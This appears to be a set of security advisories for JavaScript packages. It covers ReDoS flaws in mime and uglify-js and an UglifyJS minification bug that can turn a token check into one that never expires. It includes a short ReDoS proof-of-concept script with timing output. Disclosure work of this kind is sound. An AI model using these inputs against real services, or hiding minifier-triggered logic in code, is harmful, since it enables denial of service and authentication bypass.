Regular Expression Denial of Service

Overview:

The mime module is vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.

Recommendation:

Upgrade to version 2.0.3 or greater.

Regular Expression Denial of Service

Overview:

uglify-js is vulnerable to regular expression denial of service (ReDoS) when certain types of input is passed into .parse().

"The Regular expression Denial of Service (ReDoS) is a Denial of Service attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time." [1]

Proof of Concept

var u = require('uglify-js');
var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}

u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");

Results

$ time node test.js 10000
real    0m1.091s
user    0m1.047s
sys 0m0.039s

$ time node test.js 80000
real    0m6.486s
user    0m6.229s
sys 0m0.094s

Recommendation:

Update to version 2.6.0 or later

Incorrect Handling of Non-Boolean Comparisons During Minification

Overview:

Tom MacWright discovered that UglifyJS versions 2.4.23 and earlier are affected by a vulnerability which allows a specially crafted Javascript file to have altered functionality after minification. This bug was demonstrated by Yan to allow potentially malicious code to be hidden within secure code, activated by minification.

Details:

In Boolean algebra, DeMorgan's laws describe the relationships between conjunctions ( && ), disjunctions ( || ) and negations ( ! ). In Javascript form, they state that: !(a && b) === (!a) || (!b) !(a || b) === (!a) && (!b)

The law does not hold true when one of the values is not a boolean however.

Vulnerable versions of UglifyJS do not account for this restriction, and erroneously apply the laws to a statement if it can be reduced in length by it.

Consider this authentication function:

function isTokenValid(user) {
    var timeLeft =
        !!config && // config object exists
        !!user.token && // user object has a token
        !user.token.invalidated && // token is not explicitly invalidated
        !config.uninitialized && // config is initialized
        !config.ignoreTimestamps && // don't ignore timestamps
        getTimeLeft(user.token.expiry); // > 0 if expiration is in the future

    // The token must not be expired
    return timeLeft > 0;
}

function getTimeLeft(expiry) {
  return expiry - getSystemTime();
}

When minified with a vulnerable version of UglifyJS, it will produce the following insecure output, where a token will never expire:

( Formatted for readability )

function isTokenValid(user) {
    var timeLeft = !(                       // negation
        !config                             // config object does not exist
        || !user.token                      // user object does not have a token
        || user.token.invalidated           // token is explicitly invalidated
        || config.uninitialized             // config isn't initialized
        || config.ignoreTimestamps          // ignore timestamps
        || !getTimeLeft(user.token.expiry)  // > 0 if expiration is in the future
    );
    return timeLeft > 0
}

function getTimeLeft(expiry) {
    return expiry - getSystemTime()
}

Recommendation:

Upgrade UglifyJS to version >= 2.4.24.